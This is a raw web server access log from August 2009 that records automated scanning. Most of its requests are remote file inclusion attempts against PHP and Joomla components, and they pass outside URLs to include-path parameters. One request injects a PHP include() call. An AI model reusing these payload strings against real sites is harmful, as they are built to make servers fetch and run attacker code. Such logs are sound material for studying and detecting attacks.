61.250.92.205 - - [05/Aug/2009:00:00:24 -0400] "GET /logs/access_log.Q109052800//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.30.81.182 - - [05/Aug/2009:00:00:52 -0400] "GET /logs/error_log.Q109010700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.23.191.23 - - [05/Aug/2009:00:00:56 -0400] "GET /logs/access_log.Q109072200%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://roxd.altervista.org/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
91.121.174.74 - - [05/Aug/2009:00:00:58 -0400] "GET /logs/access_log.Q109070200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
204.12.11.202 - - [05/Aug/2009:00:01:10 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
121.78.116.209 - - [05/Aug/2009:00:01:11 -0400] "GET /logs/access_log.Q109062700/components/com_forum/download.php?phpbb_root_path=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:00:01:17 -0400] "GET /logs/access_log.Q109060600%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:00:01:17 -0400] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:00:01:17 -0400] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
204.12.11.202 - - [05/Aug/2009:00:01:36 -0400] "GET /logs/access_log.Q109070200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:00:02:05 -0400] "GET /logs/access_log.Q109052100%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.38.243.71 - - [05/Aug/2009:00:02:41 -0400] "GET /logs/access_log.Q109072700%20%20//bemarket/postscript/postscript.php?p_mode=http://www.voyageclub.ru///files/jember/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:00:02:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
60.251.217.4 - - [05/Aug/2009:00:03:03 -0400] "GET /logs/access_log.Q109071400%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:00:03:16 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://roxd.altervista.org/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:00:03:16 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://roxd.altervista.org/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:00:03:16 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://roxd.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.202.2.220 - - [05/Aug/2009:00:03:40 -0400] "GET /logs/access_log.Q109062700/components/com_forum/download.php?phpbb_root_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
221.161.196.26 - - [05/Aug/2009:00:05:33 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.161.196.26 - - [05/Aug/2009:00:05:33 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.161.196.26 - - [05/Aug/2009:00:05:33 -0400] "GET /logs/access_log.Q109062700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
91.121.174.74 - - [05/Aug/2009:00:05:46 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
221.161.196.26 - - [05/Aug/2009:00:06:10 -0400] "GET /logs/access_log.Q109062600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
91.121.174.74 - - [05/Aug/2009:00:06:32 -0400] "GET /logs/access_log.Q109070200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.38.243.71 - - [05/Aug/2009:00:07:39 -0400] "GET /logs/access_log.Q109072700%20%20//bemarket/postscript/postscript.php?p_mode=http://www.voyageclub.ru///files/jember/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:00:07:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.23.191.23 - - [05/Aug/2009:00:08:26 -0400] "GET /logs/access_log.Q109072200/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://roxd.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
121.78.116.209 - - [05/Aug/2009:00:08:51 -0400] "GET /logs/access_log.Q109062700/components/com_forum/download.php?phpbb_root_path=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.189.39.159 - - [05/Aug/2009:00:08:58 -0400] "GET //?_zb_path=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.189.39.159 - - [05/Aug/2009:00:08:58 -0400] "GET /logs//?_zb_path=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 200 12411 "-" "Mozilla/5.0"
221.161.196.26 - - [05/Aug/2009:00:09:35 -0400] "GET /logs/access_log.Q109062700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
221.161.196.26 - - [05/Aug/2009:00:09:55 -0400] "GET /logs/access_log.Q109062600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:00:10:10 -0400] "GET /logs/access_log.Q109060600//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:00:10:10 -0400] "GET /logs/access_log.Q109052100//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
72.30.81.182 - - [05/Aug/2009:00:12:39 -0400] "GET /logs/error_log.Q109071400 HTTP/1.0" 200 3225177 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [05/Aug/2009:00:12:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.81.182 - - [05/Aug/2009:00:12:48 -0400] "GET /logs/error_log.Q109071400 HTTP/1.0" 200 3225177 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.236.100.30 - - [05/Aug/2009:00:13:38 -0400] "GET /logs/error_log.Q109071800%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:00:13:38 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:00:13:38 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:13:43 -0400] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:13:43 -0400] "GET /logs/access_log.Q109071600/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:13:43 -0400] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:13:51 -0400] "GET /logs/access_log.Q109071600/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:13:51 -0400] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:13:51 -0400] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:13:53 -0400] "GET /logs/access_log.Q109071600%20%20/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:13:53 -0400] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:13:53 -0400] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:13:59 -0400] "GET /logs/access_log.Q109071600%20%20/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:13:59 -0400] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:13:59 -0400] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:14:05 -0400] "GET //main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:14:05 -0400] "GET /logs//main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:14:05 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:14:08 -0400] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:14:08 -0400] "GET /logs/access_log.Q109071600%20%20/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:14:08 -0400] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:14:10 -0400] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:14:10 -0400] "GET /logs/access_log.Q109071600%20%20/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:14:10 -0400] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:14:12 -0400] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:14:12 -0400] "GET /logs/access_log.Q109071600/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:14:12 -0400] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:14:12 -0400] "GET /logs/access_log.Q109071600/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:14:12 -0400] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:14:12 -0400] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:14:13 -0400] "GET /logs/error_log.Q109051000//main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
220.181.7.128 - - [05/Aug/2009:00:15:13 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
79.23.191.23 - - [05/Aug/2009:00:15:21 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://roxd.altervista.org/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:15:26 -0400] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.125.66.132 - - [05/Aug/2009:00:15:27 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.55.133.26 - - [05/Aug/2009:00:15:34 -0400] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:15:34 -0400] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:15:34 -0400] "GET /logs/access_log.Q109071600/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:15:35 -0400] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:15:35 -0400] "GET /logs/access_log.Q109071600/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
216.55.133.26 - - [05/Aug/2009:00:15:35 -0400] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:00:15:43 -0400] "GET /logs/error_log.Q109061200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:16:02 -0400] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:16:02 -0400] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:16:02 -0400] "GET /logs/access_log.Q109071600/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:16:02 -0400] "GET /logs/access_log.Q109071600/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:16:02 -0400] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:00:16:02 -0400] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:16:14 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:16:14 -0400] "GET /logs/error_log.Q109051000%20%20//main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:00:16:16 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:00:16:16 -0400] "GET /logs/error_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:00:16:16 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:00:16:16 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:16:34 -0400] "GET /logs/access_log.Q109060100%20%20//main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
221.161.196.26 - - [05/Aug/2009:00:16:48 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.161.196.26 - - [05/Aug/2009:00:16:48 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.237.66.229 - - [05/Aug/2009:00:16:52 -0400] "GET /logs/error_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
218.237.66.229 - - [05/Aug/2009:00:16:52 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.237.66.229 - - [05/Aug/2009:00:16:52 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.237.66.229 - - [05/Aug/2009:00:16:52 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.237.66.229 - - [05/Aug/2009:00:16:52 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.237.66.229 - - [05/Aug/2009:00:16:52 -0400] "GET /logs/error_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:17:07 -0400] "GET /logs/error_log.Q109060100%20%20//main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:17:12 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:17:12 -0400] "GET /logs/error_log.Q109051800%20%20//main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:00:17:19 -0400] "GET /logs/access_log.Q109072200%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://roxd.altervista.org/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.43.202.66 - - [05/Aug/2009:00:17:39 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://law-rich.co.kr///db_control/download/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.43.202.66 - - [05/Aug/2009:00:17:39 -0400] "GET /logs/access_log.Q109072200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://law-rich.co.kr///db_control/download/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.43.202.66 - - [05/Aug/2009:00:17:39 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://law-rich.co.kr///db_control/download/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:00:17:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.43.202.66 - - [05/Aug/2009:00:17:57 -0400] "GET /logs/access_log.Q109061500//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://law-rich.co.kr///db_control/download/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
78.12.93.137 - - [05/Aug/2009:00:18:30 -0400] "GET /logs/access_log.Q109063000%20%20/errors.php?error=http://dronek.altervista.org//r0x-id.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.820"
203.236.100.30 - - [05/Aug/2009:00:18:39 -0400] "GET /logs/error_log.Q109071800//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:00:18:39 -0400] "GET /logs/error_log.Q109062600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
218.38.243.71 - - [05/Aug/2009:00:18:40 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.voyageclub.ru///files/jember/1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.38.243.71 - - [05/Aug/2009:00:18:42 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.voyageclub.ru///files/jember/1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.38.243.71 - - [05/Aug/2009:00:18:44 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.voyageclub.ru///files/jember/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:19:30 -0400] "GET /logs/access_log.Q109060300%20%20//main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.122.158.207 - - [05/Aug/2009:00:19:40 -0400] "GET /logs/error_log.Q109060500%20%20//main.php?sayfa=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:00:21:02 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://roxd.altervista.org/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:00:21:02 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://roxd.altervista.org/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:00:21:02 -0400] "GET /logs/access_log.Q109061400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://roxd.altervista.org/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.43.202.66 - - [05/Aug/2009:00:21:56 -0400] "GET /logs/access_log.Q109072200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://law-rich.co.kr///db_control/download/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.43.202.66 - - [05/Aug/2009:00:22:00 -0400] "GET /logs/access_log.Q109063000%20//skin/zero_vote/error.php?dir=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt?%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
211.43.202.66 - - [05/Aug/2009:00:22:00 -0400] "GET //skin/zero_vote/error.php?dir=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
211.43.202.66 - - [05/Aug/2009:00:22:00 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
211.43.202.66 - - [05/Aug/2009:00:22:05 -0400] "GET //skin/zero_vote/error.php?dir=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
